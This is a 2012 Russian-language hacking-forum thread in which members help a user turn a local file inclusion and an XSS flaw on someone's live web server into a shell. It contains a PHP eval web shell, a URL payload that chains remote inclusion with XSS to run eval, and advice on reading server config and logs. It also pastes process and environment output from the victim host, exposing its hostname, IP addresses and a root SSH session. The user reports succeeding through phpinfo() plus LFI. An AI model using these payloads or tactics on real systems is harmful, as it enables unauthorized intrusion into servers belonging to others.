LFI в тандеме с XSS

Discussion in 'Уязвимости' started by Pirotexnik, 13 Mar 2012.

Thread Status:
Not open for further replies.
  1. Pirotexnik

    Pirotexnik Banned

    Joined:
    13 Oct 2010
    Messages:
    365
    Likes Received:
    68
    Reputations:
    38
    Доброго времени суток.
    Встретил очень интересную дыру.
    file.php принимает 2 переменные.
    В первой - LFI
    Во второй - XSS

    При эксплуатации хсс выводится куча JS кода, среди которого содержимое переменной.
    Лфи - и в африке лфи.

    Вопрос вот в чем:
    Можно как-то юзнуть хсс, воткнув в ние минишелл, а потом проиклудить эту страницу?

    Например из кэша.
    ЛФИ через include_once()
    Спасибо.
     
  2. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    736
    Likes Received:
    73
    Reputations:
    19
    Т.к js не гузит сам по себе файлы на сервер то ни как, если через js засубмитиш форму загрузки файла из админки но звучит както бредово...
    Мб json?
    Юзай лфи нафига себе мозг парить?
     
  3. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    Ничего не получится. Ты инклудишь сам файл, а не то, что он выводит.
     
  4. Pirotexnik

    Pirotexnik Banned

    Joined:
    13 Oct 2010
    Messages:
    365
    Likes Received:
    68
    Reputations:
    38
    Так. Как я понял хсс ничем не поможет.
    Тогда такой вопрос. (писать буду в этом топике, дабы не засорять)

    выдает
    Не существуют.

    выдаёт
    Code:
    Name:	httpd
    State:	R (running)
    SleepAVG:	10%
    Tgid:	14018
    Pid:	14018
    PPid:	1945
    TracerPid:	0
    Uid:	504	504	504	504
    Gid:	504	504	504	504
    FDSize:	256
    Groups:	504 
    VmPeak:	   25404 kB
    VmSize:	   25404 kB
    VmLck:	       0 kB
    VmHWM:	   10560 kB
    VmRSS:	   10560 kB
    VmData:	    3840 kB
    VmStk:	      88 kB
    VmExe:	     848 kB
    VmLib:	   16860 kB
    VmPTE:	      44 kB
    StaBrk:	08129000 kB
    Brk:	09ae6000 kB
    StaStk:	bf941410 kB
    ExecLim:	0811c000
    Threads:	1
    SigQ:	0/32622
    SigPnd:	0000000000000000
    ShdPnd:	0000000000000000
    SigBlk:	0000000000000000
    SigIgn:	0000000000001200
    SigCgt:	000000018440646b
    CapInh:	0000000000000000
    CapPrm:	0000000000000000
    CapEff:	0000000000000000
    Cpus_allowed:	ffffffff
    Mems_allowed:	1
    
    ПРИЧЕМ
    Всевремя меняется.

    2,3,4,5 и тд, до 15
    Не существует.

    выдаёт
    Code:
    SSH2_AUTH_SOCK=/tmp/ssh-root/ssh2-9247-agentHOSTNAME=janixwww3.amsnl.webair.comSHELL=/bin/bashTERM=screenHISTSIZE=1000USER=rootSSH2_CLIENT=209.200.59.212 61004 77.245.49.230 2200LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:PATH=/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/sbin:/sbin:/usr/bin:/bin:/usr/local/bin:/home/toor/binMAIL=/var/spool/mail/rootSSH_AA_SOCK=/tmp/ssh-root/ssh2-9247-agentPWD=/home/toorINPUTRC=/etc/inputrcLANG=en_US.UTF-8SSH2_SFTP_LOG_FACILITY=-1HOME=/home/toorSHLVL=2LOGNAME=rootLESSOPEN=|/usr/bin/lesspipe.sh %sG_BROKEN_FILENAMES=1_=/www/apache/bin/httpd
    Можно ли как-то достать логи?
     
    #4 Pirotexnik, 13 Mar 2012
    Last edited: 13 Mar 2012
  5. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    www/apache/bin/httpd это ж бинарник получается, не?
    Прочекай www/apache/conf/httpd.conf, например.
     
    1 person likes this.
  6. Pirotexnik

    Pirotexnik Banned

    Joined:
    13 Oct 2010
    Messages:
    365
    Likes Received:
    68
    Reputations:
    38
    FQziT, спасибо!
    ww/apache/conf/httpd.conf стработало!
    Буду чекать дальше. Не уходите с топика :)

    ап

    <?php eval($_GET[piro]); ?> в коде выглядит как
    &lt;?php eval($_GET[piro]); ?&gt;

    Обходится?

    ErrorLog /dev/null

    /dev/null - не существует :(

    Apache 1.3.37
     
    #6 Pirotexnik, 13 Mar 2012
    Last edited: 13 Mar 2012
  7. Pirotexnik

    Pirotexnik Banned

    Joined:
    13 Oct 2010
    Messages:
    365
    Likes Received:
    68
    Reputations:
    38
    Проблемма решилась через заливку ВСО с помощью phpinfo() и LFI.
    Всем спасибо! Closed!
     
  8. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    Инклюд файлов и XSS можно связать только в единственном случае, если есть RFI но разрешен инклуд только локальных файлов, и тогда .php?file=http://localdomain.ltd/script.php?xss=<?php+eval($_GET[e]);?>&e=phpinfo(); сработает
     
    _________________________
Thread Status:
Not open for further replies.